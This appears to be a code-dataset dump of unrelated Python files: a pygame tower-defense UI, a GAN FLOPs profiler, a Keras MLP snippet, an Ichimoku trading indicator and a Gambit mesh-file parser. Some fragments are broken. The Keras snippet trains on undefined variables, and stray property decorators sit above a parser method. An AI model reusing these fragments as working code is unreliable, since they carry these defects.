warning_text.get_width() + padding), constants.INFO_PANEL_HEIGHT // 2 + padding)
)
self.screen.blit(info_panel_surf, (0, constants.SCREEN_SIZE[1]))
def display_instructions_sign(self):
inst_sign_surf = pg.Surface(
(constants.SCREEN_SIZE[0], constants.INSTRUCTIONS_SIGN_HEIGHT))
inst_sign_surf.fill('black')
text = self.fonts[0].render(
"Pressione 'h' para ver as instruções", False, constants.ENEMY_PATH_COLOR)
inst_sign_surf.blit(text, (constants.SCREEN_SIZE[0] // 2 - text.get_width(
) // 2, constants.INSTRUCTIONS_SIGN_HEIGHT // 2 - text.get_height() // 2))
self.screen.blit(
inst_sign_surf, (0, constants.SCREEN_SIZE[1] + constants.INFO_PANEL_HEIGHT))
def display_tower_info(self, tower: Tower):
tower_info_surf = pg.Surface(
(constants.SCREEN_SIZE[0], constants.INSTRUCTIONS_SIGN_HEIGHT))
tower_info_surf.fill('black')
padding = 4
name = self.fonts[1].render(
tower.name, False, constants.WHITE)
tower_info_surf.blit(name, (constants.SCREEN_SIZE[0] // 2 - name.get_width(
) // 2, padding))
data = self.fonts[0].render(
f"Preço: {tower.price} Dano: {tower.damage} Área: {tower.range} Velocidade: {tower.speed}",
False, constants.ENEMY_PATH_COLOR)
tower_info_surf.blit(data, (constants.SCREEN_SIZE[0] // 2 - data.get_width(
) // 2, name.get_height() + padding * 2))
self.screen.blit(
tower_info_surf, (0, constants.SCREEN_SIZE[1] + constants.INFO_PANEL_HEIGHT))
def display_instructions_modal(self):
instructions_modal = pg.Surface(constants.INSTRUCTIONS_MODAL_SIZE)
instructions_modal.fill(constants.GRAY)
padding_y = 4
padding_x = 16
title = self.fonts[1].render("Instruções", False, constants.WHITE)
instructions_modal.blit(title,
(constants.INSTRUCTIONS_MODAL_SIZE[0] // 2 - title.get_width() // 2,
padding_y))
for i, txt in enumerate(constants.INSTRUCTIONS):
instruction_txt = self.fonts[0].render(
txt, False, constants.WHITE)
instructions_modal.blit(
instruction_txt, (padding_x, title.get_height() + padding_y * (i + 2) +
instruction_txt.get_height() * (i + 1)))
self.screen.blit(instructions_modal,
(constants.SCREEN_SIZE[0] // 2 - constants.INSTRUCTIONS_MODAL_SIZE[0] // 2,
constants.SCREEN_SIZE[1] // 2 - constants.INSTRUCTIONS_MODAL_SIZE[1] // 2)
)
def set_warning(self, message: str):
self.warning = message
def update(self, state: GameState, available_coins: int, rounds_complete: int,
selected_tower: Tower):
self.display_information_panel(state, available_coins, rounds_complete)
if self.show_instructions:
self.display_instructions_modal()
if state == GameState.BUILDING_TOWER:
self.display_tower_info(selected_tower)
else:
self.display_instructions_sign()
| 4,482 | -12 | 211 |
fc5253d197cc9da32d095fb6b7be586333917faa | 1,903 | py | Python | flops.py | Pragyanstha/SummerCamp2021 | caa8bba64020ba52bdef2b23a7a54de93e93b8af | [
"MIT"
] | null | null | null | flops.py | Pragyanstha/SummerCamp2021 | caa8bba64020ba52bdef2b23a7a54de93e93b8af | [
"MIT"
] | null | null | null | flops.py | Pragyanstha/SummerCamp2021 | caa8bba64020ba52bdef2b23a7a54de93e93b8af | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Date : 2019-10-01
# @Author : Xinyu Gong (xy_gong@tamu.edu)
# @Link : None
# @Version : 0.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cfg
import models_search
import datasets
from functions import train, validate, LinearLrDecay, load_params, copy_params, cur_stages
from utils.utils import set_log_dir, save_checkpoint, create_logger
from utils.inception_score import _init_inception
from utils.fid_score import create_inception_graph, check_or_download_inception
import torch
import os
import numpy as np
import torch.nn as nn
from tensorboardX import SummaryWriter
from tqdm import tqdm
from copy import deepcopy
from adamw import AdamW
import random
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
from models_search.ViT_8_8 import matmul, count_matmul
if __name__ == '__main__':
main()
| 29.734375 | 90 | 0.736206 | # -*- coding: utf-8 -*-
# @Date : 2019-10-01
# @Author : Xinyu Gong (xy_gong@tamu.edu)
# @Link : None
# @Version : 0.0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cfg
import models_search
import datasets
from functions import train, validate, LinearLrDecay, load_params, copy_params, cur_stages
from utils.utils import set_log_dir, save_checkpoint, create_logger
from utils.inception_score import _init_inception
from utils.fid_score import create_inception_graph, check_or_download_inception
import torch
import os
import numpy as np
import torch.nn as nn
from tensorboardX import SummaryWriter
from tqdm import tqdm
from copy import deepcopy
from adamw import AdamW
import random
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
from models_search.ViT_8_8 import matmul, count_matmul
def main():
    """Build the generator/discriminator from CLI args and report the
    generator's FLOPs and parameter count via thop.

    Removed the unused ``math`` import; behavior is otherwise unchanged.
    """
    args = cfg.parse_args()
    # Seed every RNG source so profiling runs are reproducible.
    torch.cuda.manual_seed(args.random_seed)
    torch.cuda.manual_seed_all(args.random_seed)
    np.random.seed(args.random_seed)
    random.seed(args.random_seed)
    torch.backends.cudnn.deterministic = True

    # set tf env
    # _init_inception()
    # inception_path = check_or_download_inception(None)
    # create_inception_graph(inception_path)

    # import network
    # NOTE(review): eval() on CLI-provided model names executes arbitrary
    # attribute paths -- acceptable for a research script, not for untrusted input.
    gen_net = eval('models_search.'+args.gen_model+'.Generator')(args=args).cuda()
    dis_net = eval('models_search.'+args.dis_model+'.Discriminator')(args=args).cuda()

    gen_net.set_arch(args.arch, cur_stage=2)

    import thop
    # One latent vector (batch 1, dim 1024) is enough to trace the graph.
    dummy_data = (1, 1024)
    macs, params = thop.profile(gen_net, inputs=(torch.randn(dummy_data).cuda(), ),
                                custom_ops={matmul: count_matmul})
    flops, params = thop.clever_format([macs, params], "%.3f")
    print('Flops (GB):\t', flops)
    print('Params Size (MB):\t', params)
main()
| 944 | 0 | 23 |
65da5a2f28ead7b6339a00c7a6352c9c5cd8ef96 | 605 | py | Python | src/analysis/deep_analysis/convnet.py | EstevaoVieira/spikelearn | 060206558cc37c31493f1c9f01412d90375403cb | [
"MIT"
] | null | null | null | src/analysis/deep_analysis/convnet.py | EstevaoVieira/spikelearn | 060206558cc37c31493f1c9f01412d90375403cb | [
"MIT"
] | null | null | null | src/analysis/deep_analysis/convnet.py | EstevaoVieira/spikelearn | 060206558cc37c31493f1c9f01412d90375403cb | [
"MIT"
] | null | null | null | from keras.layers import Input, Dense
from keras.models import Model
# This returns a tensor
inputs = Input(shape=(784,))
# a layer instance is callable on a tensor, and returns a tensor
x = Dense(64, activation='relu')(inputs)
x = Dense(64, activation='relu')(x)
predictions = Dense(10, activation='softmax')(x)
# This creates a model that includes
# the Input layer and three Dense layers
model = Model(inputs=inputs, outputs=predictions)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels) # starts training
| 31.842105 | 64 | 0.719008 | from keras.layers import Input, Dense
from keras.models import Model
# This returns a tensor
inputs = Input(shape=(784,))
# a layer instance is callable on a tensor, and returns a tensor
x = Dense(64, activation='relu')(inputs)
x = Dense(64, activation='relu')(x)
predictions = Dense(10, activation='softmax')(x)
# This creates a model that includes
# the Input layer and three Dense layers
model = Model(inputs=inputs, outputs=predictions)
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels) # starts training
| 0 | 0 | 0 |
5e8c4524180be5fac7edb4be49f28a653753cfa2 | 6,512 | py | Python | app/analyzers/indicators/ichimoku.py | rd-mg/crypto-signal | 03014d60cf345e89a6e8558f648a84d3ddb94400 | [
"MIT"
] | 50 | 2020-12-02T11:41:31.000Z | 2022-03-25T22:14:02.000Z | app/analyzers/indicators/ichimoku.py | rd-mg/crypto-signal | 03014d60cf345e89a6e8558f648a84d3ddb94400 | [
"MIT"
] | 45 | 2020-12-02T13:02:53.000Z | 2022-03-20T21:25:14.000Z | app/analyzers/indicators/ichimoku.py | rd-mg/crypto-signal | 03014d60cf345e89a6e8558f648a84d3ddb94400 | [
"MIT"
] | 39 | 2020-12-30T20:59:28.000Z | 2022-03-19T19:45:06.000Z | """ Ichimoku Indicator
"""
import math
import numpy
import pandas
from talib import abstract
from analyzers.utils import IndicatorUtils
from importlib import import_module
| 47.532847 | 151 | 0.603962 | """ Ichimoku Indicator
"""
import math
import numpy
import pandas
from talib import abstract
from analyzers.utils import IndicatorUtils
from importlib import import_module
class Ichimoku(IndicatorUtils):
    def analyze(self, historical_data, tenkansen_period, kijunsen_period, senkou_span_b_period, custom_strategy=None,
                signal=['tenkansen', 'kijunsen'], hot_thresh=None, cold_thresh=None, chart=None):
        """Performs an ichimoku cloud analysis on the historical data

        Args:
            historical_data (list): A matrix of historical OHCLV data.
            signal (list, optional): Defaults to tenkansen and kijunsen. The indicator
                line to check hot/cold against.  (The shared default list is only
                read, never mutated, so the mutable default is harmless here.)
            hot_thresh (float, optional): Defaults to None. The threshold at which this might be
                good to purchase.
            cold_thresh (float, optional): Defaults to None. The threshold at which this might be
                good to sell.
            tenkansen_period (int, optional)
            kijunsen_period (int, optional)
            senkou_span_b_period (int, optional)
            custom_strategy (string, optional): Defaults to None. Name of the custom strategy. The file name and class name
                should have the same name as the custom strategy.

        Returns:
            pandas.DataFrame: A dataframe containing the indicators and hot/cold values.
        """
        dataframe = self.convert_to_dataframe(historical_data)
        # pre-allocate the result frame with NaN columns aligned on the input index.
        ichimoku_columns = {
            'tenkansen': [numpy.nan] * dataframe.index.shape[0],
            'kijunsen': [numpy.nan] * dataframe.index.shape[0],
            'leading_span_a': [numpy.nan] * dataframe.index.shape[0],
            'leading_span_b': [numpy.nan] * dataframe.index.shape[0],
            'chikou_span': [numpy.nan] * dataframe.index.shape[0]
        }
        ichimoku_values = pandas.DataFrame(ichimoku_columns,
                                           index=dataframe.index
                                           )
        # value calculations: rolling lows/highs feeding each ichimoku line.
        low_tenkansen = dataframe['low'].rolling(window=tenkansen_period).min()
        low_kijunsen = dataframe['low'].rolling(window=kijunsen_period).min()
        low_senkou = dataframe['low'].rolling(
            window=senkou_span_b_period).min()
        high_tenkansen = dataframe['high'].rolling(
            window=tenkansen_period).max()
        high_kijunsen = dataframe['high'].rolling(window=kijunsen_period).max()
        high_senkou = dataframe['high'].rolling(
            window=senkou_span_b_period).max()
        chikou_span_delay = 26
        ichimoku_values['chikou_span'] = dataframe['close'].shift(-chikou_span_delay)
        ichimoku_values['tenkansen'] = (low_tenkansen + high_tenkansen) / 2
        ichimoku_values['kijunsen'] = (low_kijunsen + high_kijunsen) / 2
        ichimoku_values['leading_span_a'] = (
            (ichimoku_values['tenkansen'] + ichimoku_values['kijunsen']) / 2)
        ichimoku_values['leading_span_b'] = (high_senkou + low_senkou) / 2
        ichimoku_values['is_hot'] = False
        ichimoku_values['is_cold'] = False
        try:
            # add time period for cloud offset
            ## if cloud discplacement changed the ichimuko plot will be off ##
            cloud_displacement = 26
            last_time = dataframe.index[-1]
            timedelta = dataframe.index[1] - dataframe.index[0]
            newindex = pandas.date_range(last_time + timedelta,
                                         freq=timedelta,
                                         periods=cloud_displacement)
            # DataFrame.append() was deprecated in pandas 1.4 and removed in
            # 2.0; pandas.concat() is the supported equivalent.
            ichimoku_values = pandas.concat(
                [ichimoku_values, pandas.DataFrame(index=newindex)])
            # cloud offset
            ichimoku_values['leading_span_a'] = ichimoku_values['leading_span_a'].shift(
                cloud_displacement)
            ichimoku_values['leading_span_b'] = ichimoku_values['leading_span_b'].shift(
                cloud_displacement)
            if chart is None:
                if custom_strategy is None:
                    leading_span_hot = False
                    leading_span_cold = False
                    tk_cross_hot = False
                    tk_cross_cold = False
                    # NOTE(review): ('a' and 'b') in signal only tests the last
                    # literal ('b' / 'span_b') for membership; verify intent
                    # before tightening to test both names.
                    tk_cross_enabled = (('tenkansen' and 'kijunsen') in signal)
                    leading_span_enabled = (('leading_span_a' and 'leading_span_b') in signal)
                    date = dataframe.index[-1]
                    leading_span_date = ichimoku_values.index[-1]
                    if tk_cross_enabled:
                        tk_cross_hot = ichimoku_values['tenkansen'][date] > ichimoku_values['kijunsen'][date]
                        tk_cross_cold = ichimoku_values['tenkansen'][date] < ichimoku_values['kijunsen'][date]
                    if leading_span_enabled:
                        leading_span_hot = ichimoku_values['leading_span_a'][leading_span_date] > ichimoku_values['leading_span_b'][leading_span_date]
                        leading_span_cold = ichimoku_values['leading_span_a'][leading_span_date] < ichimoku_values['leading_span_b'][leading_span_date]
                    if hot_thresh:
                        ichimoku_values.at[date, 'is_hot'] = tk_cross_hot or leading_span_hot
                    if cold_thresh:
                        ichimoku_values.at[date, 'is_cold'] = tk_cross_cold or leading_span_cold
                else:
                    # dynamically load user_data/strategies/<name>.py and use
                    # the class of the same name to decide hot/cold.
                    module = import_module("user_data.strategies." + custom_strategy)
                    attr = getattr(module, custom_strategy)
                    custom_hot, custom_cold = attr.analyze(ichimoku_values, dataframe)
                    date = dataframe.index[-1]
                    if hot_thresh:
                        ichimoku_values.at[date, 'is_hot'] = custom_hot
                    if cold_thresh:
                        ichimoku_values.at[date, 'is_cold'] = custom_cold
            # Undo shifting in order to have the values aligned for displaying
            ichimoku_values['chikou_span'] = dataframe['close']
            ichimoku_values['leading_span_a'] = ichimoku_values['leading_span_a'].shift(-cloud_displacement)
            ichimoku_values['leading_span_b'] = ichimoku_values['leading_span_b'].shift(-cloud_displacement)
            ichimoku_values.dropna(how='any', inplace=True)
        except Exception as e:
            # deliberate best-effort: fall through and return whatever was built.
            print('Error running ichimoku analysis: {}'.format(e))
        return ichimoku_values
| 0 | 6,313 | 23 |
6b4d04e3e45c02d8ec3c966574f5be9c4f848e90 | 29,131 | py | Python | solvcon/io/gambit.py | j8xixo12/solvcon | a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a | [
"BSD-3-Clause"
] | 16 | 2015-12-09T02:54:42.000Z | 2021-04-20T11:26:39.000Z | solvcon/io/gambit.py | j8xixo12/solvcon | a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a | [
"BSD-3-Clause"
] | 95 | 2015-12-09T00:49:40.000Z | 2022-02-14T13:34:55.000Z | solvcon/io/gambit.py | j8xixo12/solvcon | a8bf3a54d4b1ed91d292e0cdbcb6f2710d33d99a | [
"BSD-3-Clause"
] | 13 | 2015-05-08T04:16:42.000Z | 2021-01-15T09:28:06.000Z | # -*- coding: UTF-8 -*-
#
# Copyright (c) 2008, Yung-Yu Chen <yyc@solvcon.net>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Gambit Neutral file.
"""
from .core import FormatIO
class ElementGroup(object):
    """
    One single element group information in Gambit Neutral file.

    @ivar ngp: element group index (1-based).
    @type ngp: int
    @ivar nelgp: number elements in this group.
    @type nelgp: int
    @ivar mtyp: material type (0: undefined, 1: conjugate, 2: fluid, 3: porous,
        4: solid, 5: deformable).
    @type mtyp: int
    @ivar nflags: number of solver dependent flags.
    @type nflags: int
    @ivar solver: array of solver dependent flags of shape of (nflags).
    @type solver: numpy.ndarray
    @ivar elems: elements array of shape of (nelgp).
    @type elems: numpy.ndarray
    """
    def _parse(self, data):
        """
        Parse given string data for element group.  Set all instance variables.

        @param data: string data for element group.
        @type data: string
        @return: nothing
        """
        from numpy import array
        # first three records: control line, group name, solver flags; the
        # remainder is the element list.
        control, enttype, solver, data = data.split('\n', 3)
        # the control line interleaves labels and values; take every second
        # token (the values) for NGP/NELGP/MTYP/NFLAGS.
        self.ngp, self.nelgp, self.mtyp, self.nflags = [
            int(val) for val in control.split()[1::2]]
        # get name.
        self.elmmat = enttype.strip()
        # solver dependent flags; split()-based parsing replaces the
        # deprecated numpy.fromstring(..., sep=' ') text mode.
        self.solver = array(solver.split(), dtype='int32')
        # element indices, renumbered from 1-based (file) to 0-based.
        self.elems = array(data.split(), dtype='int32') - 1
class BoundaryCondition(object):
    """
    Hold boundary condition values.

    @cvar CLFCS_RMAP: map clfcs definition back from block object to neutral
        object.
    @type CLFCS_RMAP: dict
    @ivar name: name of boundary condition.
    @type name: str
    @ivar itype: type of data (0: nodal, 1: elemental).
    @type itype: int
    @ivar nentry: number of entry (nodes or elements/cells).
    @type nentry: int
    @ivar nvalues: number of values for each data record.
    @type nvalues: int
    @ivar ibcode: 1D array of boundary condition code.
    @type ibcode: numpy.ndarray
    @ivar values: array of values attached to each record.
    @type values: numpy.ndarray
    """
    # NOTE(review): this copy of the class shows no __init__; attribute
    # initialization presumably lives in the full source -- verify there.
    def _parse(self, data):
        """
        Parse given data string to boundary condition set.  Set all instance
        variables.

        @param data: string data for boundary condition set.
        @type data: str
        @return: nothing
        """
        from numpy import fromstring
        # parse header: first 32 characters hold the BC name; the rest are
        # integer tokens (itype, nentry, nvalues, then the ibcode array).
        header, data = data.split('\n', 1)
        self.name = header[:32].strip()
        tokens = fromstring(header[32:], dtype='int32', sep=' ')
        self.itype, self.nentry, self.nvalues = tokens[:3]
        self.ibcode = tokens[3:].copy()
        # parse entries.  The same text is scanned twice: once as int32 for
        # the index column(s), once as float64 for the value columns.
        if self.itype == 0: # for nodes.
            arr = fromstring(data, dtype='int32', sep=' ').reshape(
                (self.nentry, self.nvalues+1))
            self.elems = (arr[:,0]-1).copy()
            arr = fromstring(data, dtype='float64', sep=' ').reshape(
                (self.nentry, self.nvalues+1))
            self.values = (arr[:,1:]).copy()
        elif self.itype == 1: # for elements/cells.
            arr = fromstring(data, dtype='int32', sep=' ').reshape(
                (self.nentry, self.nvalues+3))
            self.elems = arr[:,:3].copy()
            # only the element index (column 0) is renumbered to 0-based;
            # columns 1-2 (element type, face index) are kept as stored.
            self.elems[:,0] -= 1
            arr = fromstring(data, dtype='float64', sep=' ').reshape(
                (self.nentry, self.nvalues+3))
            self.values = (arr[:,3:]).copy()
        else:
            raise ValueError("itype has to be either 0/1, but get %d" %
                self.itype)
    # define map for clfcs (from block to neu).
    CLFCS_RMAP = {}
    # tpn=1: edge.
    CLFCS_RMAP[1] = [1,2]
    # tpn=2: quadrilateral.
    CLFCS_RMAP[2] = [1,2,3,4]
    # tpn=3: triangle.
    CLFCS_RMAP[3] = [1,2,3]
    # tpn=4: hexahedron.
    CLFCS_RMAP[4] = [5,2,6,4,1,3]
    # tpn=5: tetrahedron.
    CLFCS_RMAP[5] = [1,2,4,3]
    # tpn=6: prism.
    CLFCS_RMAP[6] = [4,5,3,1,2]
    # tpn=7: pyramid.
    CLFCS_RMAP[7] = [5,2,3,4,1]
    def tobc(self, blk):
        """
        Extract gambit boundary condition information from self into BC object.
        Only process element/cell type of (gambit) boundary condition, and
        return None while nodal BCs encountered.

        @param blk: Block object for reference, nothing will be altered.
        @type blk: solvcon.block.Block
        @return: generic BC object.
        @rtype: solvcon.boundcond.BC
        """
        from numpy import empty
        from ..boundcond import BC
        clfcs_rmap = self.CLFCS_RMAP
        # process only element/cell type of bc.
        if self.itype != 1:
            return None
        # extract boundary face list.
        facn = empty((self.nentry,3), dtype='int32')
        facn.fill(-1)
        ibnd = 0
        for entry in self.elems:
            icl, nouse, it = entry[:3]
            tpn = blk.cltpn[icl]
            # map the neutral file's 1-based local face index to the block's
            # clfcs column for this cell shape.
            facn[ibnd,0] = blk.clfcs[icl, clfcs_rmap[tpn][it-1]]
            ibnd += 1
        # craft BC object.
        bc = BC(fpdtype=blk.fpdtype)
        bc.name = self.name
        slct = facn[:,0].argsort() # sort face list for bc object.
        bc.facn = facn[slct]
        bc.value = self.values[slct]
        # finish.
        return bc
class GambitNeutralParser(object):
    """
    Parse and store information of a Gambit Neutral file.

    @ivar data: data to be parsed.
    @type data: str
    @ivar neu: GambitNeutral object to be saved.
    @type neu: solvcon.io.gambit.neutral.GambitNeutral
    """
    def __init__(self, data, neu):
        """
        @param data: data to be parsed.
        @type data: str
        @param neu: GambitNeutral object to be saved.
        @type neu: solvcon.io.gambit.neutral.GambitNeutral
        """
        self.data = data
        self.neu = neu
    # Sectional processors: plain functions (no self) registered into this
    # class-level dict, keyed by the section header keyword.
    # NOTE(review): the driver that splits self.data into sections and
    # dispatches on these keys is not visible in this copy -- confirm
    # against the full source.
    processors = {}
    def _control_info(data, neu):
        """
        Take string data for "CONTROL INFO" and parse it to GambitNeutral
        object.  Set:
         - header
         - title
         - data_source
         - numnp
         - nelem
         - ngrps
         - nbsets
         - ndfcd
         - ndfvl

        @param data: sectional data.
        @type data: str
        @param neu: object to be saved.
        @type neu: solvcon.io.gambit.neutral.GambitNeutral
        @return: nothing
        """
        from numpy import fromstring
        data = data.rstrip()
        records = data.splitlines()
        neu.header = records[1].strip()
        neu.title = records[2].strip()
        neu.data_source = records[3].strip()
        # record 6 holds the six mesh-size integers in fixed order.
        values = fromstring(records[6], dtype='int32', sep=' ')
        neu.numnp, neu.nelem, neu.ngrps, \
            neu.nbsets, neu.ndfcd, neu.ndfvl = values
    processors['CONTROL INFO'] = _control_info
    def _nodal_coordinate(data, neu):
        """
        Take string data for "NODAL COORDINATES" and parse it to GambitNeutral
        object.  Set:
         - nodes

        @param data: sectional data.
        @type data: str
        @param neu: object to be saved.
        @type neu: solvcon.io.gambit.neutral.GambitNeutral
        @return: nothing
        """
        from numpy import fromstring, empty
        # discard header.
        data = data.split('\n', 1)[-1]
        # parse into array and reshape to 2D array.
        nodes = fromstring(data, dtype='float64', sep=' ')
        nodes = nodes.reshape((neu.numnp, (neu.ndfcd+1)))
        # renumber according to first value of each line.
        # NOTE: unused number contains garbage.
        number = nodes[:,0].astype(int) - 1
        newnodes = empty((number.max()+1,neu.ndfcd))
        newnodes[number] = nodes[number,1:]
        # set result to neu.
        neu.nodes = newnodes
    processors['NODAL COORDINATE'] = _nodal_coordinate
    def _elements_cells(data, neu):
        """
        Take string data for "ELEMENTS/CELLS" and parse it to GambitNeutral
        object.  Set:
         - elems

        @param data: sectional data.
        @type data: str
        @param neu: object to be saved.
        @type neu: solvcon.io.gambit.neutral.GambitNeutral
        @return: nothing
        """
        from numpy import fromstring, empty
        # discard header.
        data = data.split('\n', 1)[-1]
        # parse into array.
        serial = fromstring(data, dtype='int32', sep=' ')
        # parse element data -- 1st pass:
        # element index, shape, and number of nodes.
        meta = empty((neu.nelem, 3), dtype='int32')
        ielem = 0
        ival = 0
        while ielem < neu.nelem:
            meta[ielem,:] = serial[ival:ival+3]
            ival += 3+meta[ielem,2]
            ielem += 1
        # parse element data -- 2nd pass:
        # node definition.
        maxnnode = meta[:,2].max()
        elems = empty((neu.nelem, maxnnode+2), dtype='int32')
        ielem = 0
        ival = 0
        while ielem < neu.nelem:
            elems[ielem,2:2+meta[ielem,2]] = serial[ival+3:ival+3+meta[ielem,2]]
            ival += 3+meta[ielem,2]
            ielem += 1
        elems[:,:2] = meta[:,1:] # copy the first two columns from meta.
        elems[:,2:] -= 1 # renumber node indices in elements.
        # set result to neu.
        neu.elems = elems
    processors['ELEMENTS/CELLS'] = _elements_cells
    def _element_group(data, neu):
        """
        Take string data for "ELEMENT GROUP" and parse it to GambitNeutral
        object.  Set:
         - grps

        @param data: sectional data.
        @type data: str
        @param neu: object to be saved.
        @type neu: solvcon.io.gambit.neutral.GambitNeutral
        @return: nothing
        """
        from numpy import fromstring, empty
        # discard header.
        data = data.split('\n', 1)[-1]
        # build group.
        neu.grps.append(ElementGroup(data))
    processors['ELEMENT GROUP'] = _element_group
    def _boundary_conditions(data, neu):
        """
        Take string data for "BOUNDARY CONDITIONS" and parse it to
        GambitNeutral object.  Set:
         - bcs

        @param data: sectional data.
        @type data: str
        @param neu: object to be saved.
        @type neu: solvcon.io.gambit.neutral.GambitNeutral
        @return: nothing
        """
        from numpy import fromstring, empty
        # discard header.
        data = data.split('\n', 1)[-1]
        # build group.
        neu.bcs.append(BoundaryCondition(data))
    processors['BOUNDARY CONDITIONS'] = _boundary_conditions
class GambitNeutralReader(object):
    """
    Read and store information of a Gambit Neutral file line by line.

    @ivar neuf: source file.
    @itype neuf: file
    @ivar neu: GambitNeutral object to be saved to.
    @itype neu: solvcon.io.gambit.neutral.GambitNeutral
    """
    # NOTE(review): this copy carried five stray decorators stacked above
    # _read_values (residue of removed methods); they turned the attribute
    # into a classmethod(staticmethod(...)) chain and broke direct calls.
    # Only the method's own @staticmethod is kept (the body uses neither
    # self nor cls).
    @staticmethod
    def _read_values(neuf, width, nval, dtype):
        """
        Read homogeneous values from the current position of the opened
        neutral file.

        @param neuf: neutral file.
        @type neuf: file
        @param width: character width per value.
        @type width: int
        @param nval: number of values to read.
        @type nval: int
        @param dtype: dtype string to construct ndarray.
        @type dtype: str
        @return: read array.
        @rtype: numpy.ndarray
        """
        from numpy import empty
        # determine the scalar parser from the requested dtype.
        if dtype.startswith('int'):
            vtype = int
        elif dtype.startswith('float'):
            vtype = float
        else:
            raise TypeError('%s not supported'%dtype)
        # allocate array.
        arr = empty(nval, dtype=dtype)
        # read fixed-width fields line by line until nval values are filled.
        iline = 0
        ival = 0
        while ival < nval:
            line = neuf.readline()
            iline += 1
            line = line.rstrip()
            nc = len(line)
            if nc%width != 0:
                raise IndexError('not exact chars at line %d'%iline)
            nt = nc//width
            # slice each field by the caller-supplied width; the previous
            # code hard-coded 8 here, which disagreed with the nc%width
            # check for any other field width.
            arr[ival:ival+nt] = [vtype(line[width*it:width*(it+1)])
                                 for it in range(nt)]
            ival += nt
        assert ival == nval
        return arr
class GambitNeutral(object):
    """
    Represent information in a Gambit Neutral file.

    @cvar CLTPN_MAP: map cltpn from self to block.
    @type CLTPN_MAP: numpy.ndarray
    @cvar CLNDS_MAP: map clnds definition from self to block.
    @type CLNDS_MAP: dict
    @cvar CLFCS_RMAP: map clfcs definition back from block to self.
    @type CLFCS_RMAP: dict
    @ivar header: file header string.
    @type header: str
    @ivar title: title for this file.
    @type title: str
    @ivar data_source: identify the generation of the file from which program
        and version.
    @type data_source: str
    @ivar numnp: number of nodes.
    @type numnp: int
    @ivar nelem: number of elements.
    @type nelem: int
    @ivar ngrps: number of element groups.
    @type ngrps: int
    @ivar nbsets: number of boundary condition sets.
    @type nbsets: int
    @ivar ndfcd: number of coordinate directions (2/3).
    @type ndfcd: int
    @ivar ndfvl: number of velocity components (2/3).
    @type ndfvl: int
    @ivar nodes: nodes array of shape of (numnp, ndfcd).
    @type nodes: numpy.ndarray
    @ivar elems: elements array of shape of (nelem, :).
    @type elems: numpy.ndarray
    @ivar grps: list of ElementGroup objects.
    @type grps: list
    @ivar bcs: list of BoundaryCondition objects.
    @type bcs: list
    """
    # NOTE(review): the three bare @property decorators below look like
    # residue of removed ndim/nnode/ncell properties (toblock reads
    # self.ndim/self.nnode/self.ncell); as written they wrap toblock and
    # would break calling it -- confirm against the full source.
    @property
    @property
    @property
    def toblock(self, onlybcnames=None, bcname_mapper=None, fpdtype=None,
            use_incenter=False):
        """
        Convert GambitNeutral object to Block object.

        @keyword onlybcnames: positively list wanted names of BCs.
        @type onlybcnames: list
        @keyword bcname_mapper: map name to bc type number.
        @type bcname_mapper: dict
        @keyword fpdtype: floating-point dtype.
        @type fpdtype: str
        @keyword use_incenter: use incenter when creating block.
        @type use_incenter: bool
        @return: Block object.
        @rtype: solvcon.block.Block
        """
        from ..block import Block
        # create corresponding block according to GambitNeutral object.
        blk = Block(ndim=self.ndim, nnode=self.nnode, ncell=self.ncell,
            fpdtype=fpdtype, use_incenter=use_incenter)
        self._convert_interior_to(blk)
        blk.build_interior()
        self._convert_bc_to(blk,
            onlynames=onlybcnames, name_mapper=bcname_mapper)
        blk.build_boundary()
        blk.build_ghost()
        return blk
    # class-body import; as a side effect this binds 'array' as a class
    # attribute after the maps below are built.
    from numpy import array
    # define map for cltpn (from self to block).
    CLTPN_MAP = array([0, 1, 2, 3, 4, 6, 5, 7], dtype='int32')
    # define map for clnds (from self to block), keyed first by Gambit
    # element type, then by the node count stored in the file.
    CLNDS_MAP = {}
    # tpn=1: edge.
    CLNDS_MAP[1] = {}
    CLNDS_MAP[1][2] = [2,3] # 2 nodes.
    CLNDS_MAP[1][3] = [2,4] # 3 nodes.
    # tpn=2: quadrilateral.
    CLNDS_MAP[2] = {}
    CLNDS_MAP[2][4] = [2,3,4,5] # 4 nodes.
    CLNDS_MAP[2][8] = [2,4,6,8] # 8 nodes.
    CLNDS_MAP[2][9] = [2,4,6,8] # 9 nodes.
    # tpn=3: triangle.
    CLNDS_MAP[3] = {}
    CLNDS_MAP[3][3] = [2,3,4] # 3 nodes.
